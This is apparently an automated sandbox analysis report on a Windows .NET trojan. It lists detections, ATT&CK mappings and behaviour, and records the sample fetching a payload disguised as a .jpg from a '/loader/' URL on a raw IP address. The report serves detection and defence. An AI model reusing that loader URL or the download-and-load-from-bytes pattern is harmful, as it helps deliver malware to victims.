Edit tour

Windows Analysis Report
P355uy6y7d

Overview

General Information

Sample Name:P355uy6y7d (renamed file extension from none to exe)
Analysis ID:630062
MD5:36cf17949de5c5b6352c9d43ae2b6171
SHA1:44b8ca8856a490f67bd87b61aaee9fa659861813
SHA256:4e88ad28c28a0c02bec0b70271acf0ad1898f64ee1e9ef5a86f844001fb3a19a
Tags:exetrojan
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
.NET source code contains potential unpacker
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
One or more processes crash
PE file contains strange resources
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
HTTP GET or POST without a user agent
Enables debug privileges

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • P355uy6y7d.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\P355uy6y7d.exe" MD5: 36CF17949DE5C5B6352C9D43AE2B6171)
    • WerFault.exe (PID: 5052 cmdline: C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: P355uy6y7d.exeAvira: detected
Source: P355uy6y7d.exeVirustotal: Detection: 27%Perma Link
Source: P355uy6y7d.exeReversingLabs: Detection: 19%
Source: P355uy6y7d.exeJoe Sandbox ML: detected
Source: P355uy6y7d.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:nY source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: 0C:\Windows\mscorlib.pdbG> source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdbP source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbNn source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb.0p source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp, WER2F62.tmp.dmp.6.dr
Source: Binary string: indows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb`. source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdbRSDS] source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: global trafficHTTP traffic detected: GET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1Host: 194.87.31.4Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.31.4
Source: P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.87.31.4
Source: P355uy6y7d.exe, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg
Source: P355uy6y7d.exeString found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxu
Source: P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: global trafficHTTP traffic detected: GET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1Host: 194.87.31.4Connection: Keep-Alive
Source: P355uy6y7d.exeStatic PE information: No import functions for PE file found
Source: P355uy6y7d.exeBinary or memory string: OriginalFilename vs P355uy6y7d.exe
Source: P355uy6y7d.exe, 00000000.00000002.500555693.00000000015A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs P355uy6y7d.exe
Source: P355uy6y7d.exe, 00000000.00000000.422618831.00000000015A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs P355uy6y7d.exe
Source: P355uy6y7d.exeBinary or memory string: OriginalFilenameRevoveryUpdate.exe" vs P355uy6y7d.exe
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
Source: P355uy6y7d.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: P355uy6y7d.exeStatic PE information: invalid certificate
Source: P355uy6y7d.exeVirustotal: Detection: 27%
Source: P355uy6y7d.exeReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\P355uy6y7d.exeFile read: C:\Users\user\Desktop\P355uy6y7d.exeJump to behavior
Source: P355uy6y7d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P355uy6y7d.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\P355uy6y7d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknownProcess created: C:\Users\user\Desktop\P355uy6y7d.exe "C:\Users\user\Desktop\P355uy6y7d.exe"
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
Source: C:\Users\user\Desktop\P355uy6y7d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6948
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F62.tmpJump to behavior
Source: P355uy6y7d.exeString found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg
Source: P355uy6y7d.exeString found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxujml-Uicqqfdirrhcqhiwjmrgee7Gwagkw.Properties.Resources>?
Source: classification engineClassification label: mal64.evad.winEXE@2/4@0/1
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\P355uy6y7d.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: P355uy6y7d.exeStatic file information: File size 2276808 > 1048576
Source: P355uy6y7d.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: P355uy6y7d.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: P355uy6y7d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: P355uy6y7d.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x201400
Source: P355uy6y7d.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:nY source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: 0C:\Windows\mscorlib.pdbG> source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdbP source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbNn source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb.0p source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp, WER2F62.tmp.dmp.6.dr
Source: Binary string: indows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb`. source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdbRSDS] source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.ni.pdb source: WER2F62.tmp.dmp.6.dr

Data Obfuscation

barindex
Source: P355uy6y7d.exe, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P355uy6y7d.exeStatic PE information: 0xFF1B72D1 [Mon Aug 17 21:49:05 2105 UTC]
Source: C:\Windows\System32\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: P355uy6y7d.exe, 00000000.00000002.500595064.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422736503.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\P355uy6y7d.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\P355uy6y7d.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\P355uy6y7d.exeQueries volume information: C:\Users\user\Desktop\P355uy6y7d.exe VolumeInformation
Source: C:\Users\user\Desktop\P355uy6y7d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter
Path Interception1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Query Registry
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Process Injection
NTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 630062 Sample: P355uy6y7d Startdate: 19/05/2022 Architecture: WINDOWS Score: 64 16 Antivirus / Scanner detection for submitted sample 2->16 18 Multi AV Scanner detection for submitted file 2->18 20 .NET source code contains potential unpacker 2->20 22 Machine Learning detection for sample 2->22 6 P355uy6y7d.exe 14 2 2->6         started        process3 dnsIp4 14 194.87.31.4, 49736, 80 ASBAXETNRU Russian Federation 6->14 9 WerFault.exe 17 9 6->9         started        process5 file6 12 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 9->12 dropped

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
P355uy6y7d.exe28%VirustotalBrowse
P355uy6y7d.exe20%ReversingLabsWin64.Trojan.Generic
P355uy6y7d.exe100%AviraHEUR/AGEN.1216637
P355uy6y7d.exe100%Joe Sandbox ML
No Antivirus matches
SourceDetectionScannerLabelLinkDownload
0.0.P355uy6y7d.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1216637Download File
0.0.P355uy6y7d.exe.bc0000.2.unpack100%AviraHEUR/AGEN.1216637Download File
0.0.P355uy6y7d.exe.bc0000.1.unpack100%AviraHEUR/AGEN.1216637Download File
0.2.P355uy6y7d.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1216637Download File
No Antivirus matches
SourceDetectionScannerLabelLink
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg3%VirustotalBrowse
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg0%Avira URL Cloudsafe
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxu0%Avira URL Cloudsafe
http://194.87.31.40%VirustotalBrowse
http://194.87.31.40%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgfalse
